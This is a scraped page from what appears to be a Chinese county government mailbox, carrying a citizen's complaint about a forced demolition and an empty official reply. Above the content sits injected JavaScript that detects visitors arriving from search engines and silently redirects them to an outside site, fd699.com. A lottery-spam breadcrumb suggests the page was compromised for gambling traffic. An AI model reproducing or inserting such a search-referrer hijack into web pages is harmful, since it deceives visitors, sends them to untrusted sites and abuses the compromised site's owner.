var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
收藏
您当前所在的位置:上海快三计划 >
政民互动 > 书记信箱

来信信息
信件编号: 21245003362863
来信标题: 违章建筑
来信时间: 2019-12-23
来信内容:
请县委问领导执政是否为民?共产党给老百姓的承诺是否真实?我首先承认我有违章建筑。但是金海岸大酒店每年交多少税?为什么人家改变房屋结构都不强拆?他为庐江做了什么贡献?我为庐江供贡多少税收?为什么我没有改变房屋结构且下发整改通知没到时时带着一般纹身的人强拆我的违章建筑?是不是***执政了专门制造与老百姓对立面?还是欺压老百姓?
回复内容
答复单位: 庐江县城市管理局
办理时间: 2020-01-08
回复内容:



留言评价
查询密码:
评价结果: